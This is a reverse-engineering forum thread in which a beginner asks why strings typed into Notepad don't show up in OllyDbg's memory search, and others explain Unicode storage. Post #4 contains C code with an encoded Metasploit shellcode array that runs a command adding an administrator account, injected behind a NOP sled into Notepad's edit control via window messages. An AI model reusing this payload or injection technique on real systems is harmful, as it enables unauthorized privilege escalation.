Results 1 to 6 of 6

Thread: String doesn't appear in [Memory map] - why?

  1. #1
    Ismaele
    Guest

    Question String doesn't appear in [Memory map] - why?

    Good morning,
    i'm a newbie.

    I runned notepad.exe (under Windows XP, service packed) and i write on the main window some text.

    Next, i opened Olly, attached notepad.exe and actualized the memory map.
    I searched in Olly the string that i've previously writed on the main window of notepad.exe

    Why i doesn't find in the memory map of Olly? I've searched but nothing !!!
    Can you suggest me some solution, please? I'm using OllyDbg 1.10

    Very tnx to all :-)
    I promise that I have read the FAQ and tried to use the Search to answer my question.

  2. #2
    Naides is Nobody
    Join Date
    Jan 2002
    Location
    Planet Earth
    Posts
    1,647
    I repeated your excercise: open notepad, write in it "Fucking find me".
    Attached Olly.
    Let it run.
    Pause it.
    View Memory
    Search the whole block for "Fucking fi" in ascii. . .
    ->Nothing found
    Go back to the begining of memory block.
    Search "Fucking fi" in UNICODE
    -> found the string somewhere in low memory, below 00400000.


    Make sure you pay attention to the options, case sensitive or not, whole words or not, mind that the search engine goes from the cursor location towards the bottom (ie higher memory addresses).

  3. #3
    Ismaele
    Guest

    Smile

    Very tnx mister !, :-)
    solution you suggested me solved my question.

    But, i ask you, why Olly behave like this?

    The step you described me, is a step-by-step for all strings research in memory map?

    Good morning
    I promise that I have read the FAQ and tried to use the Search to answer my question.

  4. #4
    Ismaele
    Guest

    Question

    Help, now i can't find hexadeciml values in Olly ! Why ?

    I have that C code (compiled under Borland C++ builder 3) :
    -------------------------------------------------------------
    int main(int argc, char **argv)
    {

    HANDLE parentWindow, childWindow; //variabili usate, rispettivamente, per l'handle della classe PADRE e l'handle della classe FIGLIA
    HHOOK hh;
    char *buf;



    /* win32_exec - EXITFUNC=process CMD=cmd.exe /c net user hakin9 hakin9 /add && net localgroup administrators /add hakin9 Size=240 Encoder=PexFnstenvSub http://metasploit.com */
    unsigned char scode[] = "\x33\xc9\x83\xe9\xca\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9"
    "\x19\xe7\x78\x83\xeb\xfc\xe2\xf4\x35\xf1\xa3\x78\xc9\x19\x6c\x3d"
    "\xf5\x92\x9b\x7d\xb1\x18\x08\xf3\x86\x01\x6c\x27\xe9\x18\x0c\x31"
    "\x42\x2d\x6c\x79\x27\x28\x27\xe1\x65\x9d\x27\x0c\xce\xd8\x2d\x75"
    "\xc8\xdb\x0c\x8c\xf2\x4d\xc3\x7c\xbc\xfc\x6c\x27\xed\x18\x0c\x1e"
    "\x42\x15\xac\xf3\x96\x05\xe6\x93\x42\x05\x6c\x79\x22\x90\xbb\x5c"
    "\xcd\xda\xd6\xb8\xad\x92\xa7\x48\x4c\xd9\x9f\x74\x42\x59\xeb\xf3"
    "\xb9\x05\x4a\xf3\xa1\x11\x0c\x71\x42\x99\x57\x78\xc9\x19\x6c\x10"
    "\xf5\x46\xd6\x8e\xa9\x4f\x6e\x80\x4a\xd9\x9c\x28\xa1\x67\x3f\x9a"
    "\xba\x71\x7f\x86\x43\x17\xb0\x87\x2e\x7a\x8a\x1c\xe7\x7c\x9f\x1d"
    "\xe9\x36\x84\x58\xa7\x7c\x93\x58\xbc\x6a\x82\x0a\xe9\x71\x86\x13"
    "\xa0\x77\xde\x58\xa1\x78\x8c\x11\xa7\x20\xc7\x57\xa8\x7d\x83\x58"
    "\xef\x3f\xc7\x16\xac\x6d\xc7\x14\xa6\x7a\x86\x14\xae\x6b\x88\x0d"
    "\xb9\x39\x86\x1c\xa4\x70\x89\x11\xba\x6d\x95\x19\xbd\x76\x95\x0b"
    "\xe9\x36\x86\x1c\xad\x39\x8f\x19\xa2\x70\x89\x41\xc9\x19\xe7\x78";

    childWindow=(HANDLE)0x8020C;

    if(!childWindow) {
    printf("I does't find that handle !\n");
    system("PAUSE");
    return(1);
    }
    if(SendMessage(childWindow, EM_SETREADONLY, FALSE, 0)==0) {
    printf("Signal WM_SETREADONLY sended to notepad.exe failed!\n");
    system("PAUSE");
    return 1;
    }


    buf = (char*)malloc(strlen(scode)+1024*1024+1); //modificato DA ME
    buf = (char *)memset(buf, 0x90, 1024*1024);
    strcat(buf, scode);
    buf[strlen(buf)] = 0;
    SendMessage(childWindow, EM_SETLIMITTEXT, strlen(scode)+1024*1024+1, 0);

    if(!SendMessage(childWindow, WM_SETTEXT, 0, (LPARAM)buf)) {
    printf("Sending WM_SETTEXT message failed!\n");
    system("PAUSE");
    return 1;
    }

    printf("OK !\n");
    system("PAUSE");
    return(0);
    }
    -----------------------------------------------------------------

    My program run very well, actually write the scode[] array on the control "Edit" of notepad.exe, but i didn't find values "x33\xc9\x83\xe9" in the [Memory map] of Ollydbg.

    Why? I also tried to search the value '33C983E9' like you suggest me. But nothing !

    Instead of scode[] array, if i write some normal chars (like 'try' or 'testtesttest' or 'computercomputercomputer') on the 'Edit' control of notepad.exe, in the memory map i found.

    I don't understand :-(
    I promise that I have read the FAQ and tried to use the Search to answer my question.

  5. #5
    Naides is Nobody
    Join Date
    Jan 2002
    Location
    Planet Earth
    Posts
    1,647

    In blue

    Quote Originally Posted by Ismaele View Post
    But, i ask you, why Olly behave like this?

    This is not a behavoir of Olly. Olly is obediently finding what we are asking for. It is a behavoir of NotePad: It is storing its strings in Unicode format. Ever since windows XP Windows uses Unicode to manipulate all strings in order to handle all the written alphabets in the planet, including Chinese

    The step you described me, is a step-by-step for all strings research in memory map?

    You may say so. You cannot predict what will be the format used by a given program to store a given item in memory: It may use ASCII, it may use UNICODE, it may use some proprietary encoding, or even the program may encrypt the strings to prevent us from locating them. . .


    Good morning
    in blue

  6. #6
    Naides is Nobody
    Join Date
    Jan 2002
    Location
    Planet Earth
    Posts
    1,647

    It is found: in unicode

    The string is there in Unicode: You will not find the HEX : 33C983. . . which is a translation of \x33\xc9\x83. . . to its raw bytes equivalent. Only after the c compiler interprets \x33\xc9\x83 during compilation, it is translated to hex bytes and loaded into memory when you run the compiled program itself, not the C high level code text you wrote on the Edit control of Notepad.
    Attached Images Attached Images  

Similar Threads

  1. .net String decryption
    By KarlK in forum The Newbie Forum
    Replies: 0
    Last Post: January 23rd, 2012, 02:34
  2. String search
    By w_a_r_1 in forum Advanced Reversing and Programming
    Replies: 1
    Last Post: June 15th, 2009, 03:35
  3. String references
    By Pompeyfan in forum OllyDbg Support Forums
    Replies: 8
    Last Post: March 3rd, 2004, 04:05
  4. String Ref
    By golden_123 in forum Tools of Our Trade (TOT) Messageboard
    Replies: 4
    Last Post: July 2nd, 2002, 18:48
  5. No String Reference
    By Argoth in forum Malware Analysis and Unpacking Forum
    Replies: 4
    Last Post: February 25th, 2002, 18:52

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •